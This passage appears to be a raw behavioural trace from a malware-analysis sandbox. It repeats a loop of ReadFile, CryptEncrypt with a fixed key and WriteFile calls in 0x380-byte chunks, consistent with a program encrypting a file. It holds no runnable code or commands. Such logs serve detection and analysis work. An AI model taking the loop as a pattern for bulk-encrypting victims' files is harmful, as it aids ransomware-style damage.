returned 1 [0276.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.755] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.755] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.756] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.756] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.756] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.756] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.757] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.758] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.759] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.760] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.760] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.760] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.760] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.760] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.761] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.762] ReadFile (in: 